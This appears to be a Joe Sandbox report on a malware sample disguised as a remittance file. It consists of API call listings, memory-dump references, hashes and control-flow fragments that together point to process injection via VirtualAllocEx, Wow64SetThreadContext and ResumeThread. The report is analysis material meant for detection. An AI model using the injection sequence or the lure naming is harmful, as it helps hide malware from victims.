                                            • Snapshot File: hcaresult_0_2_e30000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06BE5020
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06BE495E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E3D717
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2081782528.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e30000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06BE4E5E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E3B079,00000800,00000000,00000000), ref: 00E3B28A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2081782528.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e30000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E3B079,00000800,00000000,00000000), ref: 00E3B28A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2081782528.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e30000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06BE4E5E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00E3AFFE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2081782528.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e30000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 06BE9915
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 06BE9915
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: V
                                            • API String ID: 0-1342839628
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q
                                            • API String ID: 0-52440209
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8899f7b8ff14f4f497a234f403286c953e8d35246d0dbcead49745002ef52bfc
                                            • Instruction ID: 8bd109f11d3ecad154d5c2a7456c226befec7cd2dc796c248d1275a7e4a611a6
                                            • Opcode Fuzzy Hash: 8899f7b8ff14f4f497a234f403286c953e8d35246d0dbcead49745002ef52bfc
                                            • Instruction Fuzzy Hash: 3931AF719083889FDB11DFA9C994BDABFF5FF5A340F04849AD544AB212C374A905CFA2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 28b74dcb713798cf24d6ac1859577b727d4d31442c3c4f9e3d969be3a3e43017
                                            • Instruction ID: c0d61243f19d12d111efd27a1bf716c36554fb84ec21a3555a5f96976e2e101d
                                            • Opcode Fuzzy Hash: 28b74dcb713798cf24d6ac1859577b727d4d31442c3c4f9e3d969be3a3e43017
                                            • Instruction Fuzzy Hash: 7F312971A386658BFF11CB6989103FABBB2BF81351F148267E4B6C62C2C2F8E441C751
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 628f5e4b62bb152e204776998a3012c2117bfa755e5a1786897548af53734f08
                                            • Instruction ID: 469dacfea39e6452a04da5e000226f20c75956c3f35d6e6cb5d2b700f3acd716
                                            • Opcode Fuzzy Hash: 628f5e4b62bb152e204776998a3012c2117bfa755e5a1786897548af53734f08
                                            • Instruction Fuzzy Hash: 29214B327546089FE324DE298884BA97BA7FF85741F40846AE1478F2D5CEB08C42C755
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 287eb4260203b15e22ec30cf5a65b250f0688ee96c004c3285f9d49e00e6fc7b
                                            • Instruction ID: 66a96a3a26c982a37fbabc9e4220889afb536ae7970f759c6993280a33d18c70
                                            • Opcode Fuzzy Hash: 287eb4260203b15e22ec30cf5a65b250f0688ee96c004c3285f9d49e00e6fc7b
                                            • Instruction Fuzzy Hash: 3E213136754605AFF324CA288885BA977A3FF86B41F44846AE10B9F295CEB0C842C755
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a7eafbc5e55c156579fbd0c5b7c961206c106512b392d2c42b0989fbb10b42a1
                                            • Instruction ID: 2686d83db89b5c1449a73f4c75c2612129c8937da87ec48e9afc00ce8aa95e20
                                            • Opcode Fuzzy Hash: a7eafbc5e55c156579fbd0c5b7c961206c106512b392d2c42b0989fbb10b42a1
                                            • Instruction Fuzzy Hash: 9D21A170A25285CBE710CB6DC8406FBBBB1FF45391F40847AE56A97282D3F299808B91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2081480183.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_c9d000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fa9631459fbbd0e15662ca51f5c97c4cda64bd5b147beb79d220f4f13f280131
                                            • Instruction ID: 0ebe3ba39a22c356187e1268edfcfdf5df3080e2529c4ab0a2f2a0569f085567
                                            • Opcode Fuzzy Hash: fa9631459fbbd0e15662ca51f5c97c4cda64bd5b147beb79d220f4f13f280131
                                            • Instruction Fuzzy Hash: 27E1F8B4E001598FDB14DFA9C5809AEFBF2FF89305F2481A9E415AB356D730A941CFA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f8d06a701a1b1974c39757b89bd21149a4541b4ac19b00c4a684b5c9585537c3
                                            • Instruction ID: 51c140df661193aa7e2487c9e4b9667837a467d82185585b532fc399b486cdb1
                                            • Opcode Fuzzy Hash: f8d06a701a1b1974c39757b89bd21149a4541b4ac19b00c4a684b5c9585537c3
                                            • Instruction Fuzzy Hash: 82E1FAB4E001198FDB14DFA8C5809AEFBB2FF89305F2481A9D415AB356D730AE41CFA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 13666f1efd350adc095dddbcd3386ccfdb0a8aa7cc3939d08f5cf23cea3c1d45
                                            • Instruction ID: c586c15f16fc3690324c96e54cdacf30a9ae521a12ef4b52fab9326696c87719
                                            • Opcode Fuzzy Hash: 13666f1efd350adc095dddbcd3386ccfdb0a8aa7cc3939d08f5cf23cea3c1d45
                                            • Instruction Fuzzy Hash: 69E1F8B4E001198FDB14DFA9C5809AEFBF2FF89305F2481A9E415AB356D731A941CFA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ac100d93888e2ec956a31eb84c5570d060c825395bea3aef5cc6b436fc611385
                                            • Instruction ID: 90f14216d77b7f5657f93aeb0b52e82741e8fa500fc74e63d0e770ee41ccce07
                                            • Opcode Fuzzy Hash: ac100d93888e2ec956a31eb84c5570d060c825395bea3aef5cc6b436fc611385
                                            • Instruction Fuzzy Hash: 54E11BB4E001198FDB14DFA8C5809AEFBF2FF89305F2481A9E515AB356D731AA41CF61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: af8e012c39365e137216b36fe6e4820af2a1bf00b743e32cfbeef08b36cafe55
                                            • Instruction ID: ae1742403bd9db563e6250221f8abfbd79efc510e64601bcbdbb8383d6cbf607
                                            • Opcode Fuzzy Hash: af8e012c39365e137216b36fe6e4820af2a1bf00b743e32cfbeef08b36cafe55
                                            • Instruction Fuzzy Hash: 16E1F6B4E001198FCB14DFA9C5809AEFBF2FF89305F2485A9E415AB356D730A941CFA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2081782528.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e30000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eda97168ed518e4b8aa0a4aa583de33bbcc7fbf52a622cca8563ffb56a85a7b6
                                            • Instruction ID: 1f9d2a93fc5453cd30c6a397193e8856fe828519e595a47eb85ae7a2f2c776c2
                                            • Opcode Fuzzy Hash: eda97168ed518e4b8aa0a4aa583de33bbcc7fbf52a622cca8563ffb56a85a7b6
                                            • Instruction Fuzzy Hash: 43A16C32E00205CFCF09DFA5D94899EBBB2FF85305B1555BAE805BB262DB71E915CB80
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c2746f69b259937c8209c7b4bd35682b94814e803b944965c03d42e69eb14e8b
                                            • Instruction ID: 745fd1ec7137971789dde5ef7fb88a369901d775f818f53856d6d611ae2c7a2e
                                            • Opcode Fuzzy Hash: c2746f69b259937c8209c7b4bd35682b94814e803b944965c03d42e69eb14e8b
                                            • Instruction Fuzzy Hash: 0E511FB4D006198FCB14DFA9C5405AEFBF6FF89305F1481A9D418A7356D7319A41CFA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 60f755453015215399606c85b802279d0bda06910f13a4f484dcbc92889091e9
                                            • Instruction ID: a2f1277a60267f37e0ab3cb5f99410461c8921e493612d7e1d64641f91f428cf
                                            • Opcode Fuzzy Hash: 60f755453015215399606c85b802279d0bda06910f13a4f484dcbc92889091e9
                                            • Instruction Fuzzy Hash: 8451F8B4E002198FDB14DFA9C9805AEFBF2FF89305F2481A9D418A7356D7319942CFA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q$Te]q$Te]q$Te]q$Te]q$Te]q$Te]q$Te]q$$]q$$]q$$]q$$]q
                                            • API String ID: 0-1756099846
                                            • Opcode ID: da4145e2ebf4cd0a81c4180ba3575e90cced7260bec53b984d43f5de6f2bdd97
                                            • Instruction ID: e90dbe412fb05b206ebb14e84523517c4adaf7d6962218140eb4f69414955cfc
                                            • Opcode Fuzzy Hash: da4145e2ebf4cd0a81c4180ba3575e90cced7260bec53b984d43f5de6f2bdd97
                                            • Instruction Fuzzy Hash: 1BF1A174B60208DFEB18DF68D959BBD7AE2BF98740F104829E4069B3D4DEB48C41CB95
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q$Te]q$Te]q$Te]q$$]q$$]q
                                            • API String ID: 0-3261640282
                                            • Opcode ID: 414fa7d828becf3236941c4b40553c68a2bf8156fb9b086effe36de646688840
                                            • Instruction ID: a682c1d0eaa1cd6f323f0707fbf9913bf29926874ded699da15801811b176a37
                                            • Opcode Fuzzy Hash: 414fa7d828becf3236941c4b40553c68a2bf8156fb9b086effe36de646688840
                                            • Instruction Fuzzy Hash: A1F10F34B242549FEB05CB68D868BED7FA2BF89740F144866E442DB3D2CAB48C45CB95
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q$Te]q$Te]q$Te]q$$]q$$]q
                                            • API String ID: 0-3261640282
                                            • Opcode ID: e09eca0f66c7c565430d57533d852211e93ceca5a5ff5a150fc4781b4d6cf321
                                            • Instruction ID: 862b4280330c3f73906000ddefde804d02b8d39fb1af212ea16371f1c92532c5
                                            • Opcode Fuzzy Hash: e09eca0f66c7c565430d57533d852211e93ceca5a5ff5a150fc4781b4d6cf321
                                            • Instruction Fuzzy Hash: C2E1A074B20214DFEB14DF68D959BAD7AE2BF98740F104829E406AB3D5DFB48C41CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8aq$8aq$$]q$$]q
                                            • API String ID: 0-2167536008
                                            • Opcode ID: eb2260fa09fc9bf3b268c7d9456ea68ff03fe5330321a1673a799ff88fd9f16e
                                            • Instruction ID: 4d803bb0cf25b307058bfc1309efe2f6f4162d5f456c62a717cbe0451150230b
                                            • Opcode Fuzzy Hash: eb2260fa09fc9bf3b268c7d9456ea68ff03fe5330321a1673a799ff88fd9f16e
                                            • Instruction Fuzzy Hash: 40413971A28A518FE7508B7D88807FABBF1FF46361F048567E6A6C7286C2B4C5C5CB11

                                            Execution Graph

                                            Execution Coverage: 1.2%
                                            Dynamic/Decrypted Code Coverage: 5.3%
                                            Signature Coverage: 8.4%
                                            Total number of Nodes: 131
                                            Total number of Limit Nodes: 6

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 50 4174c3-4174ec call 42dc83 53 4174f2-417500 call 42e1a3 50->53 54 4174ee-4174f1 50->54 57 417510-417521 call 42c643 53->57 58 417502-41750d call 42e443 53->58 63 417523-417537 LdrLoadDll 57->63 64 41753a-41753d 57->64 58->57 63->64
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417535
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: ebd3c5d2265a916cd2496e5eef1ce8dc7d6870324b8f3176294337ca5bb7e159
                                            • Instruction ID: a00ac800c7afa3b22899d69d7b8551f56e0e2af9d1528a2434e061210ffc3812
                                            • Opcode Fuzzy Hash: ebd3c5d2265a916cd2496e5eef1ce8dc7d6870324b8f3176294337ca5bb7e159
                                            • Instruction Fuzzy Hash: 4F011EB5E0020DBBDB10DBA5EC42FEEB7789B54308F4441AAE90897240F675EB548B95

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 70 42b0a3-42b0dc call 404493 call 42c153 NtClose
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 039764a3c07c1c092ebdb1a119b5f68ea8d1673a7b69f32db0182162072c0f4f
                                            • Instruction ID: 71f88b7205fc17ace251b0f12029de2f72aea4145354bcf659e23292c2420cce
                                            • Opcode Fuzzy Hash: 039764a3c07c1c092ebdb1a119b5f68ea8d1673a7b69f32db0182162072c0f4f
                                            • Instruction Fuzzy Hash: 29E086322002147BC610EA5AEC81FDBB75CDFC9754F40805AFA0CA7282C67479118BF4

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 84 17d2b60-17d2b6c LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 5a0df2086f0a64429751f919be9538894ccab8346bf79a55270c0da338c8f5f0
                                            • Instruction ID: cfb84d624313eadea449f7af612ad7d1e430112c05f136dccf16f7d06bc42ec3
                                            • Opcode Fuzzy Hash: 5a0df2086f0a64429751f919be9538894ccab8346bf79a55270c0da338c8f5f0
                                            • Instruction Fuzzy Hash: 1990026120640003420571584418616808A97E4201B55C031E10145A0DC5258A916226

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 86 17d2df0-17d2dfc LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 5789bbc654ff4568ac711eead2ac9183e1cfcec799800157916e92f139ccd146
                                            • Instruction ID: 73c6f7c825fda3dcc9f0a932bc53ca62dd8125dc3e94d0048e0ae64d0ee70065
                                            • Opcode Fuzzy Hash: 5789bbc654ff4568ac711eead2ac9183e1cfcec799800157916e92f139ccd146
                                            • Instruction Fuzzy Hash: FC90023120540413D21171584508707408997D4241F95C422A0424568DD6568B52A222

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 85 17d2c70-17d2c7c LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 7f656be150585fb9ab6d531a5c02b43d6f57bcb397046b123a75e2ada1d4cb04
                                            • Instruction ID: 85804f4409594ef709451d78ba5fdb81f9cc398358337d6c7682427610d4a138
                                            • Opcode Fuzzy Hash: 7f656be150585fb9ab6d531a5c02b43d6f57bcb397046b123a75e2ada1d4cb04
                                            • Instruction Fuzzy Hash: 0D90023120548802D2107158840874A408597D4301F59C421A4424668DC6958A917222

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 87 17d35c0-17d35cc LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: c89928f37792d48a4984047122f5992905791b7031c0ee117359313a12cbc9d9
                                            • Instruction ID: f3bf2810e9835c5e9833fea3ed9fbbc400c90e70eb677d4a5a61e155de262d52
                                            • Opcode Fuzzy Hash: c89928f37792d48a4984047122f5992905791b7031c0ee117359313a12cbc9d9
                                            • Instruction Fuzzy Hash: 9890023160950402D20071584518706508597D4201F65C421A0424578DC7958B5166A3

                                            Control-flow Graph

                                            APIs
                                            • PostThreadMessageW.USER32(Y656-D6L1,00000111,00000000,00000000), ref: 00413B90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID: Y656-D6L1$Y656-D6L1
                                            • API String ID: 1836367815-3972793824
                                            • Opcode ID: cd3c3e7c46f328d0d3afa6ef64082d43e87236789113ef286146625a5c3f369b
                                            • Instruction ID: 0c7c1f1c8e5ff488f8f3714297a694b4e5b76a2b4034290cca448231b795bf26
                                            • Opcode Fuzzy Hash: cd3c3e7c46f328d0d3afa6ef64082d43e87236789113ef286146625a5c3f369b
                                            • Instruction Fuzzy Hash: 5A01DB71E4521876DB119A91DC02FDF7B7C9F40714F44805AFB087B281E6B8570687E9

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
